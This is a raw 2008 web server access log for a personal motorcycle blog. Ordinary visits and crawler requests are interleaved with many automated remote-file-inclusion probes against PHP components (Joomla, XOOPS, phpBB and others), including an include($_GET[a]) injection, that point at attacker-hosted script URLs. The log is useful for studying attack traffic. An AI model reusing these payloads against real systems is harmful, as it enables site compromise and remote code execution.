207.59.78.2 - - [08/Dec/2008:08:18:26 -0800] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:27 -0800] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:27 -0800] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:31 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-093_0.jpg HTTP/1.1" 200 343363 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:18:34 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:18:49 -0800] "GET /logs//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:18:50 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.116.64 - - [08/Dec/2008:08:19:02 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ronniann.com//assets/galleries/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:19:24 -0800] "GET /logs/access_080307.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:19:24 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:19:24 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:26 -0800] "GET /bikes/occcb//\"http://www.express. HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:26 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/feed/ HTTP/1.1" 200 716 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:26 -0800] "GET /blog/index.php/2008/09/13/occ-american-hondas-part-2/feed/ HTTP/1.1" 200 716 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:27 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/?show=gallery HTTP/1.1" 200 14781 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:27 -0800] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president/feed/ HTTP/1.1" 200 706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:27 -0800] "GET /blog/index.php/2008/10/09/so-this-guy-walks-into-a-bank-10908// HTTP/1.1" 200 9626 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:27 -0800] "GET /bikes/occcb//\"http://cart.express. HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
212.203.95.172 - - [08/Dec/2008:08:19:27 -0800] "GET /logs/access_081114.log//?sourcedir=http://www.bestmp3.ws/extras/php.ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:27 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/ HTTP/1.1" 200 9741 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:27 -0800] "GET /bikes/occcb//\" HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:27 -0800] "GET /blog/index.php/2008/09/13/occ-american-hondas-part-2/trackback/ HTTP/1.1" 200 8465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:28 -0800] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president// HTTP/1.1" 200 7120 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:28 -0800] "GET /blog/index.php/2008/09/21/a-little-game-of-moto-tag-92108/feed/ HTTP/1.1" 200 719 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:28 -0800] "GET /blog/index.php/2008/09/13/occ-american-hondas-part-2// HTTP/1.1" 200 8465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:28 -0800] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president/trackback/ HTTP/1.1" 200 7120 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:28 -0800] "GET /blog/index.php/2008/09/21/a-little-game-of-moto-tag-92108/ HTTP/1.1" 200 8833 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:29 -0800] "GET /bikes/occcb/https://signin.ebay.com/ebaymotors/ws/eBayISAPI.dll?SignIn HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:29 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/trackback/ HTTP/1.1" 200 9751 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:30 -0800] "GET /blog/index.php/2008/09/13/occ-american-hondas-part-2/ HTTP/1.1" 200 8465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:30 -0800] "GET /blog/index.php/2008/09/21/a-little-game-of-moto-tag-92108/trackback/ HTTP/1.1" 200 8833 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:30 -0800] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president/ HTTP/1.1" 200 7120 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:30 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208/feed/ HTTP/1.1" 200 682 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:30 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1// HTTP/1.1" 200 9742 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:31 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208/?show=gallery HTTP/1.1" 200 16645 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:19:31 -0800] "GET /logs/access_080919.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:31 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208// HTTP/1.1" 200 8264 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:32 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208/trackback/ HTTP/1.1" 200 8273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:33 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208/ HTTP/1.1" 200 8263 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:33 -0800] "GET /blog/index.php/2008/09/21/a-little-game-of-moto-tag-92108// HTTP/1.1" 200 8833 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:34 -0800] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/feed/ HTTP/1.1" 200 690 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:34 -0800] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie// HTTP/1.1" 200 7196 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:34 -0800] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/trackback/ HTTP/1.1" 200 7196 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:35 -0800] "GET /bikes/occcb/eBayISAPI.dll.htm/ HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:36 -0800] "GET /bikes/occcb/eBayISAPI.dll.htm/ HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:39 -0800] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/ HTTP/1.1" 200 7196 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:40 -0800] "GET /?show=slide&pageid=175 HTTP/1.1" 200 164142 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:45 -0800] "GET /?show=slide&pageid=172 HTTP/1.1" 200 160966 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:46 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/feed/ HTTP/1.1" 200 1721 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:46 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery HTTP/1.1" 200 25941 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:48 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 9451 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:48 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 9451 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:48 -0800] "GET /?show=slide&pageid=169 HTTP/1.1" 200 157624 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:48 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/trackback/ HTTP/1.1" 200 9461 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:19:48 -0800] "GET /?show=slide&pageid=163 HTTP/1.1" 200 145564 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:19:52 -0800] "GET /logs//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:19:52 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.108.120.45 - - [08/Dec/2008:08:19:53 -0800] "GET /blog/index.php/https://login.yahoo.com/config/login?.pd=c=aMtFxUmp2e6zaBL942f2v6LoDw-- HTTP/1.0" 404 7984 "-" "YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide)" "www.dmulk.com"
218.239.45.184 - - [08/Dec/2008:08:20:01 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.228.61.175 - - [08/Dec/2008:08:20:05 -0800] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&p=37778/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bengoerz.net/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.228.61.175 - - [08/Dec/2008:08:20:09 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&p=37778/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bengoerz.net/tst.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.76" "www.dmulk.com"
82.228.61.175 - - [08/Dec/2008:08:20:09 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=37778/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bengoerz.net/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:20:17 -0800] "GET /naboard_pnr.php?skin=http://gxmag.com/poll/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:20:17 -0800] "GET /logs//naboard_pnr.php?skin=http://gxmag.com/poll/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:20:18 -0800] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://gxmag.com/poll/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:20:22 -0800] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:20:26 -0800] "GET /logs/access_080819.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:20:26 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:20:26 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:20:27 -0800] "GET /naboard_pnr.php?skin=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:20:27 -0800] "GET /logs//naboard_pnr.php?skin=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:20:31 -0800] "GET /logs/access_080507.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:20:31 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:20:31 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:20:33 -0800] "GET /logs/access_080823.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:20:34 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:20:34 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.228.61.175 - - [08/Dec/2008:08:20:41 -0800] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=viewtopic&p=37778/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bengoerz.net/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:08:20:57 -0800] "GET /logs/access_080523.log/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:08:20:57 -0800] "GET /db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:08:20:57 -0800] "GET /logs/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:08:21:01 -0800] "GET /logs/access_080401.log/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:21:16 -0800] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:21:17 -0800] "GET /naboard_pnr.php?skin=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
66.7.214.132 - - [08/Dec/2008:08:21:17 -0800] "GET /logs//naboard_pnr.php?skin=http://www.gxmag.com//poll/id????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:21:37 -0800] "GET /logs/access_080511.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:08:21:43 -0800] "GET /logs/access_080523.log%20%20/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:08:21:43 -0800] "GET /logs/access_080401.log%20%20/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:21:54 -0800] "GET /logs/access_081107.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:08:21:59 -0800] "GET /db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:08:21:59 -0800] "GET /logs/access_080523.log/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:08:21:59 -0800] "GET /logs/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:08:21:59 -0800] "GET /logs/access_080401.log/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:22:10 -0800] "GET /logs/access_080831.log/?sourcedir=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:22:10 -0800] "GET /logs/access_080503.log/?sourcedir=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:22:11 -0800] "GET /logs/?sourcedir=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 200 77025 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:08:22:37 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:08:22:37 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:08:22:38 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:22:51 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:22:51 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:22:51 -0800] "GET /logs/access_080307.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.84.44.197 - - [08/Dec/2008:08:22:56 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:22:57 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.84.44.197 - - [08/Dec/2008:08:23:00 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.87.125 - - [08/Dec/2008:08:23:12 -0800] "GET /bikes/dteel/2008_08_17/?S=A HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.91.21 - - [08/Dec/2008:08:23:19 -0800] "GET /logs/access_080228.log/?include_path=http://www.rearrangefurniture.com/myimages/log/backup.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:08:23:41 -0800] "GET /logs/access_080523.log%20%20/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:08:23:46 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:23:48 -0800] "GET /logs/access_081114.log%20/index.php?sourcedir=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:08:23:49 -0800] "GET /logs/access_080401.log%20%20/db.php?commonpath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
